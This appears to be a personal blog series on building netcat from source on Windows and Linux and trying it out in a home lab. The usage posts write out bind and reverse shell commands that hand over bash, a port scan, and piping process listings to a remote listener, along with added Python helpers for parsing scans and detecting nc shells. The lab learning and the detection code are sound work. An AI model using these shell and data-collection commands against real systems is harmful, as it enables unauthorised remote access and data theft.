
Showing posts with the label "netcat". Show all posts

Friday, September 28, 2018

Attack tools - netcat Windows build I


Windows make
1. babun
2. g++, gcc
3. VS2010
4. Add the tools to PATH
5. Change the 4-space indents in the makefile to tabs
6. make all -d reports
   getopt.c(45) : fatal error C1034: stdio.h: 不包括路径集

  https://www.cnblogs.com/hiccup/p/5424009.html
  For the error "fatal error C1034: stdio.h: no include path set", the fix is to create LIB and INCLUDE environment variables: set LIB to "E:\Program Files\Microsoft Visual Studio 10.0\VC\lib" and INCLUDE to "E:\Program Files\Microsoft Visual Studio 10.0\VC\include".

7. make all -d reports
   doexec.c(10) : fatal error C1083: 无法打开包括文件:“winsock2.h”: No such file or directory
   Found it under C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\Include and added that directory to INCLUDE by hand.

8. make all -d reports
link: extra operand ‘netcat.obj’
Fix:

https://stackoverflow.com/questions/19677870/error-in-assembly-masm-linker-link-extra-operand
Ran whereis link inside babun and found it was not the Windows link that was being used, so copied it in:
cp /cygdrive/c/Program\ Files\ \(x86\)/Microsoft\ Visual\ Studio\ 10.0/vc/bin/link.exe /usr/bin/



9. make all -d reports
link getopt.obj doexec.obj netcat.obj kernel32.lib user32.lib wsock32.lib winmm.lib /nologo /subsystem:console /incremental:yes /machine:I386 /out:nc.exe
Putting child 0x8004ca68 (nc.exe) PID 2600 on the chain.
Live child 0x8004ca68 (nc.exe) PID 2600
LINK : warning LNK4224: /INCREMENTAL:YES is no longer supported;  ignored
LINK : fatal error LNK1104: cannot open file 'kernel32.lib'
Reaping losing child 0x8004ca68 PID 2600
makefile:21: recipe for target 'nc.exe' failed
Removing child 0x8004ca68 PID 2600 from chain.

The makefile defines:
lflags=kernel32.lib user32.lib wsock32.lib winmm.lib /nologo /subsystem:console /incremental:yes /machine:I386 /out:nc.exe

nc.exe: getopt.obj doexec.obj netcat.obj
$(link) getopt.obj doexec.obj netcat.obj $(lflags)

Looked up the three libs; they are in C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\Lib\x64
Added that location to the library path variable LINK uses.
Reference: https://msdn.microsoft.com/zh-cn/library/6y6t9esh.aspx
The LINK tool uses the following environment variables:
LIB (if defined). The LINK tool uses the LIB path when searching for object, library, or other files specified on the command line or through the /base option. It also uses the LIB path to find .pdb files named in objects. The LIB variable can contain one or more path specifications, separated by semicolons. One path must point to the \lib subdirectory of the Visual C++ installation.


10. make all -d now reports a large number of errors
link getopt.obj doexec.obj netcat.obj kernel32.lib user32.lib wsock32.lib winmm.lib /nologo /subsystem:console /incremental:yes /machine:I386 /out:nc.exe
LINK : warning LNK4224: /INCREMENTAL:YES is no longer supported;  ignored
doexec.obj : error LNK2019: unresolved external symbol _holler referenced in function _StartShell
LIBCMT.lib(lseeki64.obj) : error LNK2019: unresolved external symbol __imp__GetLastError@0 referenced in function __lseeki64_nolock
LIBCMT.lib(read.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(close.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(dup.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(tidtable.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(osfinfo.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(wctomb.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(realloc.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(commit.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(winsig.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(rand_s.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(inithelp.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
doexec.obj : error LNK2001: unresolved external symbol __imp__GetLastError@0

[popexizhi:
grep shows holler is defined in netcat, while doexec.obj is listed first in the link line; not sure whether that is the problem, so changed the order to
nc.exe: getopt.obj doexec.obj netcat.obj
$(link) getopt.obj netcat.obj doexec.obj $(lflags)
]
11. After changing the order, make all -d still reports a large number of errors
link getopt.obj netcat.obj doexec.obj kernel32.lib user32.lib wsock32.lib winmm.lib /nologo /subsystem:console /incremental:yes /machine:I386 /out:nc.exe
LINK : warning LNK4224: /INCREMENTAL:YES is no longer supported;  ignored
netcat.obj : error LNK2019: unresolved external symbol _WSACleanup@0 referenced in function _res_init
netcat.obj : error LNK2019: unresolved external symbol _WSAStartup@8 referenced in function _res_init
LIBCMT.lib(lseeki64.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(read.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(close.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(dup.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(tidtable.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(osfinfo.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(wctomb.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(realloc.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(commit.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(winsig.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(rand_s.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0
LIBCMT.lib(inithelp.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0


Reference for WSACleanup: https://baike.baidu.com/item/WSACleanup()
Checked the source; winsock2.h is included as
#ifdef __MINGW32__
#include <_mingw.h>
#include <winsock2.h>
#endif

Manually added
#ifdef __MINGW32__
#include <_mingw.h>
#include <winsock2.h>
#endif

#include "generic.h" /* same as with L5, skey, etc */
#include <winsock2.h>
Compiling now gives the following error
link getopt.obj netcat.obj doexec.obj kernel32.lib user32.lib wsock32.lib winmm.lib /nologo /subsystem:console /incremental:yes /machine:I386 /out:nc.exe
LINK : warning LNK4224: /INCREMENTAL:YES is no longer supported;  ignored
netcat.obj : error LNK2019: unresolved external symbol __imp__WSACleanup@0 referenced in function _res_init
netcat.obj : error LNK2019: unresolved external symbol __imp__WSAStartup@8 referenced in function _res_init
LIBCMT.lib(lseeki64.obj) : error LNK2001: unresolved external symbol __imp__GetLastError@0


https://stackoverflow.com/questions/16948064/unresolved-external-symbol-lnk2019
#pragma comment(lib, "Ws2_32.lib")
Looked up where Ws2_32.lib lives; there are three copies, and the one I had written into the lib definition earlier was the x64 one :). Changed it to the default C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\Lib

12. After adjusting the lib path, make all
gives the following:
link getopt.obj netcat.obj doexec.obj kernel32.lib user32.lib wsock32.lib winmm.lib /nologo /subsystem:console /incremental:yes /machine:I386 /out:nc.exe
LINK : warning LNK4224: /INCREMENTAL:YES is no longer supported;  ignored
netcat.obj : error LNK2019: unresolved external symbol _strcasecmp referenced in function _comparehosts
doexec.obj : error LNK2019: unresolved external symbol _holler referenced in function _StartShell
nc.exe : fatal error LNK1120: 2 unresolved externals
makefile:23: recipe for target 'nc.exe' failed

Fix: https://github.com/osmcode/libosmium/issues/59
strcasecmp is a Linux function, not a Windows one. Fine.
Added the following before the strcasecmp call in comparehosts:
#ifdef _MSC_VER
#define strncasecmp _strnicmp
#define strcasecmp _stricmp
#endif

13. After adjusting the lib path, make all
gives the following:
doexec.obj : error LNK2019: unresolved external symbol _holler referenced in function _StartShell
nc.exe : fatal error LNK1120: 1 unresolved externals
makefile:23: recipe for target 'nc.exe' failed

Analysis: it seems holler, which StartShell uses, is not defined at all; this is not an obj link-order problem.

Thursday, September 13, 2018

Attack tools - Linux nc usage experiments II


https://www.jianshu.com/p/cb26a0f6c622
IV)
NC file/directory transfer
nc -lp 4444 >1.txt    (1.txt is the file name to save as; pick your own)

nc -nv ip port <1.txt -q 1    (ps: it is best to name the file on the listening side after the file itself)

V) nc directories
tar -cvf - directory/|nc -lp port -q 1
[popexizhi: unfortunately, the nc pope compiled has no -q option, and without -q it seems a directory cannot be received]
packs the directory
nc -nv ip port |tar -xvf -
unpacks the directory

Test run, sadly no -q :)
# tar -cvf - data/|nc -lp 12222 -q 1
nc: invalid option -- 'q'
Ncat: Try `--help' or man(1) ncat for more information, usage options and help. QUITTING.
data/

VI) NC streaming media
A: cat wing.mp4|nc -lp port
B: nc -nv ip port |mplayer -vo x11 -cache 4000
A sends the file wing.mp4 to B as a stream; B plays it with mplayer, playing as much as it has received, with a cache of 4000 bytes
[popexizhi: this looks nice, but I could not find an mp4 file; will test it when I have one]

VII) NC port scanning
nc -nvz ip 1-65535
[popexizhi: works very well, but why can't > save the output directly?]
# ./nc -nvz 192.168.100.121 1000-1010>121-port
cannot connect to 192.168.100.121:1000 (192.168.100.121)
cannot connect to 192.168.100.121:1001 (192.168.100.121)
cannot connect to 192.168.100.121:1002 (192.168.100.121)
cannot connect to 192.168.100.121:1003 (192.168.100.121)
cannot connect to 192.168.100.121:1004 (192.168.100.121)
cannot connect to 192.168.100.121:1005 (192.168.100.121)
cannot connect to 192.168.100.121:1006 (192.168.100.121)
cannot connect to 192.168.100.121:1007 (192.168.100.121)
cannot connect to 192.168.100.121:1008 (192.168.100.121)
cannot connect to 192.168.100.121:1009 (192.168.100.121)
cannot connect to 192.168.100.121:1010 (192.168.100.121)
# ll
-rw-r--r--. 1 root root     0 9月  14 10:30 121-port
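The "cannot connect to ..." lines above are written by nc to stderr, which is why `>121-port` left an empty file; `2>121-port` (or `2>&1`) captures them. As an added example, not part of the original post, here is a small Python parser for such a captured file that reports open and closed ports; the sample lines are constructed from the formats shown on this page, and the function names are my own:

```python
import re
import sys
from typing import Dict, List

# Constructed sample in the format nc -nvz prints on stderr: the
# "cannot connect" lines seen above plus the "... open" line format
# nc prints for a reachable port (as in experiment III).
SAMPLE_SCAN_OUTPUT = """\
cannot connect to 192.168.100.121:1000 (192.168.100.121)
cannot connect to 192.168.100.121:1001 (192.168.100.121)
192.168.100.121:1022 (192.168.100.121) open
cannot connect to 192.168.100.121:1003 (192.168.100.121)
192.168.100.121:1080 (192.168.100.121) open
"""

CLOSED_RE = re.compile(r"^cannot connect to (\S+):(\d+) \(")
OPEN_RE = re.compile(r"^(\S+):(\d+) \(\S+\) open$")


def parse_nc_scan(text: str) -> Dict[str, List[int]]:
    """Return {"open": [...], "closed": [...]} from nc -nvz stderr output.

    Lines matching neither pattern are ignored; ports come back sorted
    so the result does not depend on the order nc printed them in.
    """
    result: Dict[str, List[int]] = {"open": [], "closed": []}
    for line in text.splitlines():
        m = OPEN_RE.match(line)
        if m:
            result["open"].append(int(m.group(2)))
            continue
        m = CLOSED_RE.match(line)
        if m:
            result["closed"].append(int(m.group(2)))
    result["open"].sort()
    result["closed"].sort()
    return result


if __name__ == "__main__":
    # Typical use: nc -nvz host 1000-1010 2>scan.txt ; python this.py scan.txt
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SCAN_OUTPUT
    print(parse_nc_scan(data))
```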


Wednesday, September 12, 2018

Attack tools - nc Linux experiments I


Reference: https://www.jianshu.com/p/cb26a0f6c622

I) Forward connection test

NC remote control
This one is the most interesting, so I put it first.
Forward connection
A: nc -lp port -c bash
B: nc ip port
A hands its bash to B
Experiment setup
A 192.168.100.120
B 192.168.100.121
[120 netcat]# nc -lp 12222 -c bash
bash:行3: ipconfig: 未找到命令
bash:行4: $'\r': 未找到命令
bash:行7: $'p\b': 未找到命令


[121@netcat]# ./nc 192.168.100.120 12222
ls
nc
pwd
/root/tool/netcat
ipconfig
^M
ip add
1: lo: mtu 65536 qdisc noqueue state UNKNOWN qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens192: mtu 1500 qdisc mq state UP qlen 1000
    link/ether 00:0c:29:a4:fb:01 brd ff:ff:ff:ff:ff:ff
    inet 192.168.100.120/24 brd 192.168.100.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fea4:fb01/64 scope link
       valid_lft forever preferred_lft forever
whoami
root
p^H
who
root     pts/0        2018-09-13 09:42 (192.168.88.66)
ps -ef|grep java
root      1262  1185  0 09:46 pts/0    00:00:01 java -jar fitnesse-standalone.jar
root      1330  1318  0 09:58 pts/0    00:00:00 grep java


II) Reverse connection
A: nc -lp port
B: nc ip port -c bash
B hands its bash to A
On Windows, replace bash with cmd
Experiment setup
A 192.168.100.120
B 192.168.100.121
[120 netcat]# nc -lp 12222
ip add
1: lo: mtu 65536 qdisc noqueue state UNKNOWN qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens192: mtu 1500 qdisc mq state UP qlen 1000
    link/ether 00:50:56:b8:77:74 brd ff:ff:ff:ff:ff:ff
    inet 192.168.100.121/24 brd 192.168.100.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:feb8:7774/64 scope link
       valid_lft forever preferred_lft forever
who
root     pts/0        2018-09-13 09:43 (192.168.88.66)
[121 netcat]# ./nc 192.168.100.120 12222 -c bash

III) Sending text messages
The simplest connection: one side listens, the other connects
nc -l -p port    listens on the given port
nc -nv ip port    connects to the other side's TCP port; by default both sides can then send text
Experiment setup
A 192.168.100.120
B 192.168.100.121
[120 netcat]# nc -l -p 12222
hi
ok ^H
hi121i^H^H^H
ok120iam121
[121 netcat]# ./nc -nv 192.168.100.120 12222
192.168.100.120:12222 (192.168.100.120) open
hi
ok
hi121i
ok120iami^H121
^C

IV) One-off data collection
Collect process information from the target machine
nc -l -p 4444 >wing.txt    saves whatever the remote side sends into a local file
ps aux |nc -nv ip port -q 1    after standard input finishes, delay one second, then the data is sent to the listener
Experiment setup
A 192.168.100.120
B 192.168.100.121
[120 netcat]# nc -l -p 12222 >wing.log
[120 netcat]# cat wing.log
root      2753  0.0  0.0 112720   972 pts/0    S+   10:20   0:00 grep --color=auto java

[121 netcat]# ps aux|grep java|./nc -nv 192.168.100.120 12222
192.168.100.120:12222 (192.168.100.120) open
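The `nc ... -c bash` invocations in I) and II) are exactly what a defender wants to spot in a process listing like the `ps -ef` output shown above. As an added example that is not part of the original post, here is a Python check over constructed `ps -ef` style lines that flags nc/ncat processes spawning a program and tells a listener (bind) apart from an outbound connection (reverse); function names and sample PIDs are my own:

```python
import re
import shlex
from typing import Dict, List, Optional

# Constructed ps -ef style lines: the two shell-spawning invocations from the
# experiments above, plus nc/ncat uses that must not (or must) be flagged.
SAMPLE_PS_LINES = [
    "root  1401  1185  0 09:58 pts/0  00:00:00 nc -lp 12222 -c bash",
    "root  1410  1186  0 09:59 pts/1  00:00:00 ./nc 192.168.100.120 12222 -c bash",
    "root  1420  1187  0 10:01 pts/1  00:00:00 nc -l -p 12222",
    "root  1421  1187  0 10:02 pts/1  00:00:00 ncat -e /bin/sh 192.168.100.120 4444",
    "root  1430  1188  0 10:03 pts/2  00:00:00 grep --color=auto nc",
]

NC_NAMES = {"nc", "ncat", "netcat"}
SHELL_FLAGS = {"-c", "-e", "--sh-exec", "--exec"}
# UID PID PPID C STIME TTY TIME CMD
PS_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\d+)\s+\S+\s+\S+\s+\S+\s+\S+\s+(.*)$")


def classify_nc(cmdline: str) -> Optional[str]:
    """Return 'bind' or 'reverse' if cmdline is nc spawning a program, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] not in NC_NAMES:
        return None
    args = argv[1:]
    spawns = any(a in SHELL_FLAGS or a.startswith(("--sh-exec=", "--exec="))
                 for a in args)
    if not spawns:
        return None
    # -l may be bundled with other short flags, e.g. -lp or -vlp.
    listens = any(a == "-l" or (a.startswith("-") and not a.startswith("--")
                                and "l" in a[1:]) for a in args)
    return "bind" if listens else "reverse"


def find_nc_shells(ps_lines: List[str]) -> List[Dict[str, str]]:
    """Scan ps -ef style lines and report nc processes that spawn a program."""
    hits: List[Dict[str, str]] = []
    for line in ps_lines:
        m = PS_RE.match(line)
        if not m:
            continue
        kind = classify_nc(m.group(4))
        if kind:
            hits.append({"user": m.group(1), "pid": m.group(2),
                         "kind": kind, "cmd": m.group(4)})
    return hits
```

The plain listener `nc -l -p 12222` from experiment III is not reported, because without `-c`/`-e` no program is attached to the socket.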

Tuesday, September 11, 2018

Attack tools - netcat Linux build


Source:
https://github.com/bonzini/netcat

The current build result is saved at: https://github.com/popexizhi/TreasureChest-/tree/attack-tool/nc
Built with Makefile.am and configure.ac; this is pope's first time using them, so recording it here:
Reference: https://blog.csdn.net/qq_19876131/article/details/51079068


$aclocal  # run directly in the source root; if it is missing, yum install automake
$autoconf  # same, run directly; autoconf generates configure from configure.in and aclocal.m4
$automake --add-missing # automake generates several files from Makefile.am, most importantly Makefile.in; the configure generated earlier then produces the final Makefile from Makefile.in. The problem hit here is recorded below
$./configure
$make all-am # when the build finishes there is an nc in the current directory, ready to use :)
Problem log:

I. Problem:
[root@lijie-121 netcat]# automake --add-missing
configure.ac:5: error: required file 'config.h.in' not found

Fix: (https://github.com/stevedh/readingdb/issues/1)
[root@lijie-121 netcat]# autoreconf --install
[root@lijie-121 netcat]# automake --add-missing

II. Problem
$make
...
/root/tool/netcat/config/missing:行81: makeinfo: 未找到命令
WARNING: 'makeinfo' is missing on your system.
         You should only need it if you modified a '.texi' file, or
         any other file indirectly affecting the aspect of the manual.
         You might want to install the Texinfo package:
         
         The spurious makeinfo call might also be the consequence of
         using a buggy 'make' (AIX, DU, IRIX), in which case you might
         want to install GNU make:
         
make[1]: *** [netcat.info] 错误 127
make[1]: 离开目录“/root/tool/netcat”
make: *** [all] 错误 2
Fix: (https://blog.csdn.net/xuezhimeng2010/article/details/49070169)
yum install texinfo



Monday, September 10, 2018

Attack tools - netcat




nc is short for netcat; introduced as follows:

https://blog.csdn.net/xysoul/article/details/52270149
A simple yet useful tool that reads and writes data across network connections using the TCP or UDP protocol. It is designed to be a reliable back-end tool that can be driven directly and easily by other programs and scripts. At the same time, it is a powerful network debugging and exploration tool that can create almost any kind of network connection you need, and it has several interesting built-in features (see the usage notes below for details)


http://netcat.sourceforge.net/

What is Netcat?


Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

Found the source for now; the next step is to build and test it, so recording the code locations first
Windows
https://github.com/diegocr/netcat

Linux
http://netcat.sourceforge.net/
https://github.com/bonzini/netcat